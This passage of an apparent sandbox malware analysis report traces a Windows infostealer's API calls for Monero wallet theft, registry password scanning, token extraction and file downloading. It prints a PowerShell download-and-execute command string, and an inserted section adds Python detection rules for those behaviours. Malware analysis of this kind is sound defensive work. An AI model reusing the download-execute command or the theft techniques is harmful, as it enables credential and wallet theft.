                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                              • Instruction ID: a37ef172245dbef9fe750a4b61c4a84c41669a019dbe8005da40fcbf85f3c68a
                              • Opcode Fuzzy Hash: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                              • Instruction Fuzzy Hash: 01314D71901519EFCB05EBA4EC99DEF7778AB54302F148118F102B72A0DB74A956CF52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FFE5C0,00000000,?,00140E2C,00000000,?,00000000), ref: 00138130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00138137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00138158
                              • __aulldiv.LIBCMT ref: 00138172
                              • __aulldiv.LIBCMT ref: 00138180
                              • wsprintfA.USER32 ref: 001381AC
                               Memory Dump Source
                               • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                              • Instruction ID: 760948895650a3cd77de581ebe2cf80b7a52a43007d210e62e629847e011843e
                              • Opcode Fuzzy Hash: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                              • Instruction Fuzzy Hash: 5D211AB1E44318ABDB04DFD4DD49FAEBBB8FB44B10F104609F605BB280D7B869018BA5
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                              • InternetOpenA.WININET(00140DF7,00000001,00000000,00000000,00000000), ref: 0012610F
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0012618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001261B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001261DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0012620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00126249
                              • InternetCloseHandle.WININET(?), ref: 00126253
                              • InternetCloseHandle.WININET(00000000), ref: 00126260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                              • Instruction ID: 54a4bff400b9258f99d4ebd6ae03990c1500969d7c2778ceb082ca4851cb94dc
                              • Opcode Fuzzy Hash: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                              • Instruction Fuzzy Hash: 8E514DB1940218ABDB24DFA0DC45BEE77B8EF44701F108098F605B71C1DBB4AA99CF95
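Read together, the function entries above each reduce to a small, stable combination of APIs and string arguments. The wallet routine queries a registry value (strings SOFTWARE\monero-project\monero-core and wallet_path), appends .keys, stages the file with CopyFileA, reads the copy and removes it with DeleteFileA. The credential scan opens HKEY_CURRENT_USER (0x80000001) with KEY_READ (0x20019), walks values with RegEnumValueA and tests each name with StrStrA("Password"). The downloader calls InternetOpenA with INTERNET_OPEN_TYPE_DIRECT (1), InternetOpenUrlA with dwFlags 0x100 (INTERNET_FLAG_PRAGMA_NOCACHE), CreateFileA with GENERIC_WRITE (0x40000000) and CREATE_ALWAYS (2), then loops InternetReadFile/WriteFile over 0x400-byte chunks: a fetch-to-disk primitive. The Python below is an added example written for this report, not part of Joe Sandbox or of the sample: a parser for the report's own API line format and a rule table that maps such combinations to capability labels, run over trace lines copied from the entries on this page (the browser-key entry earlier on the page is covered by the same rules). The rule table and the capability names are assumptions introduced here, a starting point for triaging other builds against the same report format, not a validated signature set.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# One API line as printed in the report's "APIs" lists: optional bullet,
# optional "Part of subcall function XXXX:" prefix, Api.MODULE(args), ref.
# Entries without an argument list ("task.LIBCPMTD ref: 001276FB") also match.
LINE_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None


def parse_trace(text: str) -> List[ApiCall]:
    """Turn one function entry's APIs list into ApiCall records; headings,
    hashes and other non-call lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


# Capability rules (an assumption for this example): every (api, needle) pair
# must be matched by some call; needle None means any arguments, otherwise
# the needle must occur inside one of the call's arguments.
RULES: Dict[str, List[Tuple[str, Optional[str]]]] = {
    "browser_master_key_extraction": [
        ("StrStrA", "encrypted_key"), ("ReadFile", None), ("CryptStringToBinaryA", None)],
    "monero_wallet_theft": [
        ("RegQueryValueExA", None), ("lstrcat", ".keys"),
        ("CopyFileA", None), ("DeleteFileA", None)],
    "payload_download": [
        ("InternetOpenUrlA", None), ("CreateFileA", "40000000"),  # GENERIC_WRITE
        ("InternetReadFile", None), ("WriteFile", None)],
    "registry_password_scan": [
        ("RegEnumValueA", None), ("StrStrA", "Password")],
}


def _satisfied(calls: List[ApiCall], api: str, needle: Optional[str]) -> bool:
    return any(c.api == api and (needle is None or any(needle in a for a in c.args))
               for c in calls)


def classify(trace_text: str) -> Set[str]:
    """Return the set of capability labels whose every requirement is met."""
    calls = parse_trace(trace_text)
    return {name for name, reqs in RULES.items()
            if all(_satisfied(calls, api, needle) for api, needle in reqs)}


# Trace excerpts copied from the function entries on this page.
MONERO_TRACE = r"""
Part of subcall function 001212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
lstrcat.KERNEL32(?,.keys), ref: 00121377
Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
CopyFileA.KERNEL32(?,00000000,00000001), ref: 00121465
Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
DeleteFileA.KERNEL32(00000000), ref: 001214EF
"""
BROWSER_KEY_TRACE = r"""
Part of subcall function 00129CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
"""
DOWNLOADER_TRACE = r"""
InternetOpenA.WININET(00140DF7,00000001,00000000,00000000,00000000), ref: 0012610F
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0012618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001261B3
InternetReadFile.WININET(?,?,00000400,?), ref: 001261DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0012620A
"""
REG_PASSWORD_TRACE = r"""
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
task.LIBCPMTD ref: 00127555
"""

if __name__ == "__main__":
    for label, trace in [("wallet", MONERO_TRACE), ("browser_key", BROWSER_KEY_TRACE),
                         ("downloader", DOWNLOADER_TRACE), ("registry", REG_PASSWORD_TRACE)]:
        print(label, sorted(classify(trace)))
```

Each rule requires an API together with a string argument, because the APIs alone (lstrcat, ReadFile, CreateFileA) are shared by benign code; the argument needles are what tie them to this sample. When reusing this on another report, copy each function's APIs list verbatim, subcall prefixes included, since several of the discriminating calls here only appear as "Part of subcall function" lines.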
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                              • HeapFree.KERNEL32(00000000), ref: 00127459
                              • task.LIBCPMTD ref: 00127555
                               Memory Dump Source
                               • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                              • Instruction ID: cf17f8339235d4f38bebfec99031351b383ec0a2e0e9769a64a87869de94d34b
                              • Opcode Fuzzy Hash: 86e5670680de7d1666b00c85cb05f812ec4ee443821f3c6d6c9488c71fa96523
                              • Instruction Fuzzy Hash: 76612BB5D042689BDB24DB50DC51FDAB7B8BF58300F0081E9E689A6181DBB05BD9CFA1
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0012BC9F
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0012BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0012BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0012BDB9
                               Memory Dump Source
                               • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                              • Instruction ID: 84e16a3618aed68c7a601c4d5dd5e706be810151f16df6711fab3cfaef9c5dcd
                              • Opcode Fuzzy Hash: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                              • Instruction Fuzzy Hash: C1B13E72910118ABDB04FBA0DD96EEE733CAF64301F804568F546B7191EF746E49CBA2
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                              • Instruction ID: 8090f60c3b387ddaeaa0c0f383d498de0b3a28169c7f486ec9991c1b3adb438f
                              • Opcode Fuzzy Hash: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                              • Instruction Fuzzy Hash: 7DF08231904209EFD3459FE0E90972C7BB8FB04703F148198F619A6290D6B04B41DF96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00124FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00124FD1
                              • InternetOpenA.WININET(00140DDF,00000000,00000000,00000000,00000000), ref: 00124FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00125011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00125041
                              • InternetCloseHandle.WININET(?), ref: 001250B9
                              • InternetCloseHandle.WININET(?), ref: 001250C6
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 91a7a079c68cfe3dd91e357cb98463963519ca87c5444ae67d425447cc5e2c7b
                              • Instruction ID: 6beb9445b57332972b8f38fc8497f2d2239b13647dbfbd061e944feb14260fcf
                              • Opcode Fuzzy Hash: 91a7a079c68cfe3dd91e357cb98463963519ca87c5444ae67d425447cc5e2c7b
                              • Instruction Fuzzy Hash: 5731E7B4A40218ABDB24CF94DC85BDCB7B9EB48704F5081D9F609B7281C7B06A858F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                              • wsprintfA.USER32 ref: 00138459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00FFE5A8,00000000,000F003F,?,00000400), ref: 001384EC
                              • lstrlen.KERNEL32(?), ref: 00138501
                              • RegQueryValueExA.ADVAPI32(00000000,00FFE590,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00140B34), ref: 00138599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00138608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0013861A
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                              • Instruction ID: fd70808b32395fc0dee0e5325ef7836e19109563736261d4b2fda8bd59295c19
                              • Opcode Fuzzy Hash: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                              • Instruction Fuzzy Hash: D821E9B1910218ABDB24DF54DC85FE9B7B8FB48700F00C5D8E649A6140DF71AA85CFE4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001376A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001376AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00FEC240,00000000,00020119,00000000), ref: 001376DD
                              • RegQueryValueExA.ADVAPI32(00000000,00FFE608,00000000,00000000,?,000000FF), ref: 001376FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00137708
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                              • Instruction ID: 4ed6941b9f1c03d546c7083603ab92bbede42ccfada393cf6c7deb73b8ca8e3d
                              • Opcode Fuzzy Hash: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                              • Instruction Fuzzy Hash: BB014FB5A04608BBEB11DBE5DD49F69B7BCEB48701F108054FA05A7291E7B099008F51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0013773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00FEC240,00000000,00020119,001376B9), ref: 0013775B
                              • RegQueryValueExA.ADVAPI32(001376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0013777A
                              • RegCloseKey.ADVAPI32(001376B9), ref: 00137784
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                              • Instruction ID: 2d9730a7a871e695f1c262115edc03eb17d7838db78167c8e40e6e88b19a62ab
                              • Opcode Fuzzy Hash: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                              • Instruction Fuzzy Hash: A801F4B5A40308BBD711DBE4DC4AFAEBBBCEB48705F108555FA05B7291D7B065408F51
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                              • LocalFree.KERNEL32(0012148F), ref: 00129A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                              • Instruction ID: 5c9717a882a74b80e148968242c563151e1ad5b1b6e97abd04f70adac528f5df
                              • Opcode Fuzzy Hash: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                              • Instruction Fuzzy Hash: E0311AB4A00309EFDB14CF98D985BEE77B9FF48340F108158E912A7290D778AA51CFA1
                              APIs
                              • lstrcat.KERNEL32(?,00FFDEA0), ref: 001347DB
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00134801
                              • lstrcat.KERNEL32(?,?), ref: 00134820
                              • lstrcat.KERNEL32(?,?), ref: 00134834
                              • lstrcat.KERNEL32(?,00FEB9F0), ref: 00134847
                              • lstrcat.KERNEL32(?,?), ref: 0013485B
                              • lstrcat.KERNEL32(?,00FFD980), ref: 0013486F
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                                • Part of subcall function 00134570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                                • Part of subcall function 00134570: RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                                • Part of subcall function 00134570: wsprintfA.USER32 ref: 001345A6
                                • Part of subcall function 00134570: FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                              • Instruction ID: ea1e99b02d30840362d1d9fa14daf5cb5d70c43a01c9439c2974faa814a2df8d
                              • Opcode Fuzzy Hash: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                              • Instruction Fuzzy Hash: 003150B290031867CB11FBA0DC85EED777CAB68704F404589B359A6081EFB4E6898F95
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00132D85
                              Strings
                              • ')", xrefs: 00132CB3
                              • <, xrefs: 00132D39
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00132CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00132D04
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                              • Instruction ID: 1f653efa7ef9ba5802cf83ac7a8bd70726191e15505621ac67fc0fafead2f11a
                              • Opcode Fuzzy Hash: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                              • Instruction Fuzzy Hash: 6241D371C50208AADB15FFA0C892FDDB774AF24300F904159F156B7191DF746A4ACF92
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00129F41
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
